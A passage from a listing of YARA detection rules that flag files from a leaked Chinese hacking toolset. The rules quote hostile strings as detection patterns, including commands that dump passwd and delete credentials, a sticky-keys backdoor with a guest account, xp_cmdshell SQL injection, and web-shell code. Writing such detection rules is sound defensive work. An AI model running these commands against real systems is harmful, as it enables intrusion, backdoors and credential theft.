id = "7250ff73-6b08-56a4-b2bc-081060d1fa2d"
strings:
$s0 = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify\\%s" fullword ascii /* PEStudio Blacklist: strings */
$s1 = "%s\\temp\\temp%d.bat" fullword ascii /* PEStudio Blacklist: strings */
$s5 = "EventStartShell" fullword ascii /* PEStudio Blacklist: strings */
$s6 = "del /f /q \"%s\"" fullword ascii
$s7 = "\\wminotify.dll" ascii
condition:
uint16(0) == 0x5a4d and filesize < 400KB and all of them
}
CN_Honker_Intersect2_Beta
Script from disclosed CN Honker Pentest Toolset - file Intersect2-Beta.py
view YARA rule
rule CN_Honker_Intersect2_Beta {
meta:
description = "Script from disclosed CN Honker Pentest Toolset - file Intersect2-Beta.py"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "Disclosed CN Honker Pentest Toolset"
date = "2015-06-23"
score = 70
hash = "3ba5f720c4994cd4ad519b457e232365e66f37cc"
id = "d20da18d-f8c9-5eb3-8d5d-c8816cff3200"
strings:
$s1 = "os.system(\"ls -alhR /home > AllUsers.txt\")" fullword ascii /* PEStudio Blacklist: strings */
$s2 = "os.system('getent passwd > passwd.txt')" fullword ascii /* PEStudio Blacklist: strings */
$s3 = "os.system(\"rm -rf credentials/\")" fullword ascii /* PEStudio Blacklist: strings */
condition:
uint16(0) == 0x2123 and filesize < 50KB and 2 of them
}
CN_Honker_InvasionErasor
Sample from CN Honker Pentest Toolset - file InvasionErasor.exe
view YARA rule
rule CN_Honker_InvasionErasor {
meta:
description = "Sample from CN Honker Pentest Toolset - file InvasionErasor.exe"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "Disclosed CN Honker Pentest Toolset"
date = "2015-06-23"
score = 70
hash = "b37ecd9ee6b137a29c9b9d2801473a521b168794"
id = "03ccb643-9f92-5278-a358-65f56cf19ccc"
strings:
$s1 = "c:\\windows\\system32\\config\\*.*" fullword wide /* PEStudio Blacklist: strings */
$s2 = "c:\\winnt\\*.txt" fullword wide /* PEStudio Blacklist: os */
$s3 = "Command1" fullword ascii /* PEStudio Blacklist: strings */
$s4 = "Win2003" fullword ascii /* PEStudio Blacklist: os */
$s5 = "Win 2000" fullword ascii /* PEStudio Blacklist: os */
condition:
uint16(0) == 0x5a4d and filesize < 60KB and all of them
}
CN_Honker_LPK2_0_LPK
Sample from CN Honker Pentest Toolset - file LPK.DAT
view YARA rule
rule CN_Honker_LPK2_0_LPK {
meta:
description = "Sample from CN Honker Pentest Toolset - file LPK.DAT"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "Disclosed CN Honker Pentest Toolset"
date = "2015-06-23"
score = 70
hash = "5a1226e73daba516c889328f295e728f07fdf1c3"
id = "4aa40b78-5fe4-5312-881c-e5a292435ff0"
strings:
$s1 = "\\sethc.exe /G everyone:F" ascii /* PEStudio Blacklist: strings */
$s2 = "net1 user guest guest123!@#" fullword ascii /* PEStudio Blacklist: strings */
$s3 = "\\dllcache\\sethc.exe" ascii
$s4 = "sathc.exe 211" fullword ascii
condition:
uint16(0) == 0x5a4d and filesize < 1030KB and all of them
}
CN_Honker_Layer_Layer
Sample from CN Honker Pentest Toolset - file Layer.exe
view YARA rule
rule CN_Honker_Layer_Layer {
meta:
description = "Sample from CN Honker Pentest Toolset - file Layer.exe"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "Disclosed CN Honker Pentest Toolset"
date = "2015-06-23"
modified = "2022-12-21"
score = 70
hash = "0f4f27e842787cb854bd61f9aca86a63f653eb41"
id = "48e27119-da7e-5921-8d4f-f8a1e3ac0439"
strings:
$s1 = "\\Release\\Layer.pdb" ascii
$s2 = "Layer.exe" fullword wide
$s3 = "Mozilla/5.0 (Windows NT 6.3; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0" fullword wide /* PEStudio Blacklist: strings */
condition:
uint16(0) == 0x5a4d and filesize < 300KB and all of them
}
CN_Honker_LogCleaner
Sample from CN Honker Pentest Toolset - file LogCleaner.exe
view YARA rule
rule CN_Honker_LogCleaner {
meta:
description = "Sample from CN Honker Pentest Toolset - file LogCleaner.exe"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "Disclosed CN Honker Pentest Toolset"
date = "2015-06-23"
score = 70
hash = "ab77ed5804b0394d58717c5f844d9c0da5a9f03e"
id = "63ec5e47-9f3e-547a-bbff-cac8b27ac8f7"
strings:
$s3 = ".exe <ip> [(path]" fullword ascii
$s4 = "LogCleaner v" ascii
condition:
uint16(0) == 0x5a4d and filesize < 250KB and all of them
}
CN_Honker_MAC_IPMAC
Sample from CN Honker Pentest Toolset - file IPMAC.exe
view YARA rule
rule CN_Honker_MAC_IPMAC {
meta:
description = "Sample from CN Honker Pentest Toolset - file IPMAC.exe"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "Disclosed CN Honker Pentest Toolset"
date = "2015-06-23"
score = 70
hash = "24d55b6bec5c9fff4cd6f345bacac7abadce1611"
id = "5424d3a7-765a-5dfb-9177-d5633f83079f"
strings:
$s1 = "Http://Www.YrYz.Net" fullword wide
$s2 = "IpMac.txt" fullword ascii
$s3 = "192.168.0.1" fullword ascii
condition:
uint16(0) == 0x5a4d and filesize < 267KB and all of them
}
CN_Honker_MSTSC_can_direct_copy
Sample from CN Honker Pentest Toolset - file MSTSC_can_direct_copy.EXE
view YARA rule
rule CN_Honker_MSTSC_can_direct_copy {
meta:
description = "Sample from CN Honker Pentest Toolset - file MSTSC_can_direct_copy.EXE"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "Disclosed CN Honker Pentest Toolset"
date = "2015-06-23"
modified = "2022-12-21"
score = 70
hash = "2f3cbfd9f82f8abafdb1d33235fa6bfa1e1f71ae"
id = "9155cb6f-14b6-524a-9cb9-1a88f7facf4e"
strings:
$s1 = "srv\\newclient\\lib\\win32\\obj\\i386\\mstsc.pdb" ascii
$s2 = "Clear Password" fullword wide /* PEStudio Blacklist: strings */
$s3 = "/migrate -- migrates legacy connection files that were created with " fullword wide /* PEStudio Blacklist: strings */
condition:
uint16(0) == 0x5a4d and filesize < 600KB and all of them
}
CN_Honker_ManualInjection
Sample from CN Honker Pentest Toolset - file ManualInjection.exe
view YARA rule
rule CN_Honker_ManualInjection {
meta:
description = "Sample from CN Honker Pentest Toolset - file ManualInjection.exe"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "Disclosed CN Honker Pentest Toolset"
date = "2015-06-23"
score = 70
hash = "e83d427f44783088a84e9c231c6816c214434526"
id = "f0899003-824f-56ed-b653-9f7a77b9ec6a"
strings:
$s0 = "http://127.0.0.1/cookie.asp?fuck=" fullword ascii /* PEStudio Blacklist: strings */
$s16 = "http://Www.cnhuker.com | http://www.0855.tv" fullword ascii
condition:
uint16(0) == 0x5a4d and filesize < 3000KB and all of them
}
CN_Honker_Master_beta_1_7
Sample from CN Honker Pentest Toolset - file Master_beta_1.7.exe
view YARA rule
rule CN_Honker_Master_beta_1_7 {
meta:
description = "Sample from CN Honker Pentest Toolset - file Master_beta_1.7.exe"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "Disclosed CN Honker Pentest Toolset"
date = "2015-06-23"
score = 70
hash = "3be7a370791f29be89acccf3f2608fd165e8059e"
id = "78f904ec-f7cb-5fd0-a117-925ebedd1d3e"
strings:
$s1 = "http://seo.chinaz.com/?host=" fullword ascii /* PEStudio Blacklist: strings */
$s2 = "Location: getpass.asp?info=" fullword ascii
condition:
uint16(0) == 0x5a4d and filesize < 312KB and all of them
}
CN_Honker_MatriXay1073
Sample from CN Honker Pentest Toolset - file MatriXay1073.exe
view YARA rule
rule CN_Honker_MatriXay1073 {
meta:
description = "Sample from CN Honker Pentest Toolset - file MatriXay1073.exe"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "Disclosed CN Honker Pentest Toolset"
date = "2015-06-23"
modified = "2023-01-27"
score = 70
hash = "fef951e47524f827c7698f4508ba9551359578a5"
id = "23e73b89-f60e-5bc3-8974-15be16d7c408"
strings:
$s0 = "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1" ascii /* PEStudio Blacklist: strings */
$s1 = "Policy\\Scan\\GetUserLen.ini" fullword ascii /* PEStudio Blacklist: strings */
$s2 = "!YEL!Using http://127.0.0.1:%d/ to visiter https://%s:%d/" ascii /* PEStudio Blacklist: strings */
$s3 = "getalluserpasswordhash" fullword ascii /* PEStudio Blacklist: strings */
condition:
uint16(0) == 0x5a4d and filesize < 9100KB and all of them
}
CN_Honker_Md5CrackTools
Sample from CN Honker Pentest Toolset - file Md5CrackTools.exe
view YARA rule
rule CN_Honker_Md5CrackTools {
meta:
description = "Sample from CN Honker Pentest Toolset - file Md5CrackTools.exe"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "Disclosed CN Honker Pentest Toolset"
date = "2015-06-23"
score = 70
hash = "9dfd9c9923ae6f6fe4cbfa9eb69688269285939c"
id = "16e04a66-0f6f-5b94-97c3-df62aa9406a9"
strings:
$s1 = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" fullword ascii /* PEStudio Blacklist: agent */
$s2 = ",<a href='index.php?c=1&type=md5&hash=" fullword ascii
condition:
uint16(0) == 0x5a4d and filesize < 4580KB and all of them
}
CN_Honker_NBSI_3_0
Sample from CN Honker Pentest Toolset - file NBSI 3.0.exe
view YARA rule
rule CN_Honker_NBSI_3_0 {
meta:
description = "Sample from CN Honker Pentest Toolset - file NBSI 3.0.exe"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "Disclosed CN Honker Pentest Toolset"
date = "2015-06-23"
score = 70
hash = "93bf0f64bec926e9aa2caf4c28df9af27ec0e104"
id = "be8d0dce-4f7f-5f18-9ed0-99fc1dc2b22f"
strings:
$s1 = ";use master declare @o int exec sp_oacreate 'wscript.shell',@o out exec sp_oamet" wide /* PEStudio Blacklist: strings */
$s2 = "http://localhost/1.asp?id=16" fullword ascii /* PEStudio Blacklist: strings */
$s3 = " exec master.dbo.xp_cmdshell @Z--" fullword wide /* PEStudio Blacklist: strings */
$s4 = ";use master declare @o int exec sp_oacreate 'wscript.shell',@o out exec sp_oamet" wide /* PEStudio Blacklist: strings */
condition:
uint16(0) == 0x5a4d and filesize < 2600KB and 2 of them
}
CN_Honker_NetFuke_NetFuke
Sample from CN Honker Pentest Toolset - file NetFuke.exe
view YARA rule
rule CN_Honker_NetFuke_NetFuke {
meta:
description = "Sample from CN Honker Pentest Toolset - file NetFuke.exe"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "Disclosed CN Honker Pentest Toolset"
date = "2015-06-23"
score = 70
hash = "f89e223fd4f6f5a3c2a2ea225660ef0957fc07ba"
id = "833da5c7-e562-50e9-a2a9-54c36b0d1f61"
strings:
$s1 = "Mac Flood: Flooding %dT %d p/s " fullword ascii
$s2 = "netfuke_%s.txt" fullword ascii
condition:
uint16(0) == 0x5a4d and filesize < 1840KB and all of them
}
CN_Honker_Oracle_v1_0_Oracle
Sample from CN Honker Pentest Toolset - file Oracle.exe
view YARA rule
rule CN_Honker_Oracle_v1_0_Oracle {
meta:
description = "Sample from CN Honker Pentest Toolset - file Oracle.exe"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "Disclosed CN Honker Pentest Toolset"
date = "2015-06-23"
score = 70
hash = "0264f4efdba09eaf1e681220ba96de8498ab3580"
id = "0cebede9-f4ff-5efb-98bc-55df0ad656a3"
strings:
$s1 = "!http://localhost/index.asp?id=zhr" fullword ascii /* PEStudio Blacklist: strings */
$s2 = "OnGetPassword" fullword ascii /* PEStudio Blacklist: strings */
$s3 = "Mozilla/3.0 (compatible; Indy Library)" fullword ascii /* PEStudio Blacklist: strings */
condition:
uint16(0) == 0x5a4d and filesize < 3455KB and all of them
}
CN_Honker_PHP_php11
Sample from CN Honker Pentest Toolset - file php11.txt
view YARA rule
rule CN_Honker_PHP_php11 {
meta:
description = "Sample from CN Honker Pentest Toolset - file php11.txt"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "Disclosed CN Honker Pentest Toolset"
date = "2015-06-23"
score = 70
hash = "dcc8226e7eb20e4d4bef9e263c14460a7ee5e030"
id = "e20eaab1-9799-5e61-9a25-3ac0dcce5f7f"
strings:
$s1 = "<tr><td><b><?php if (!$win) {echo wordwrap(myshellexec('id'),90,'<br>',1);} else" ascii /* PEStudio Blacklist: strings */
$s2 = "foreach (glob($_GET['pathtomass'].\"/*.htm\") as $injectj00) {" fullword ascii /* PEStudio Blacklist: strings */
$s3 = "echo '[cPanel Found] '.$login.':'.$pass.\" Success\\n\";" fullword ascii /* PEStudio Blacklist: strings */
condition:
filesize < 800KB and all of them
}
CN_Honker_Perl_serv_U
Script from disclosed CN Honker Pentest Toolset - file Perl-serv-U.pl
view YARA rule
rule CN_Honker_Perl_serv_U {
meta:
description = "Script from disclosed CN Honker Pentest Toolset - file Perl-serv-U.pl"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "Disclosed CN Honker Pentest Toolset"
date = "2015-06-23"
score = 70
hash = "f333c597ff746ebd5a641fbc248497d61e3ec17b"
id = "d793227d-dd4d-5c92-bfdc-9662c3ed8933"
strings:
$s1 = "$dir = 'C:\\\\WINNT\\\\System32\\\\';" fullword ascii /* PEStudio Blacklist: strings */
$s2 = "$sock = IO::Socket::INET->new(\"127.0.0.1:$adminport\") || die \"fail\";" fullword ascii /* PEStudio Blacklist: strings */
condition:
filesize < 8KB and all of them
}
Showing 151-200 of 18,880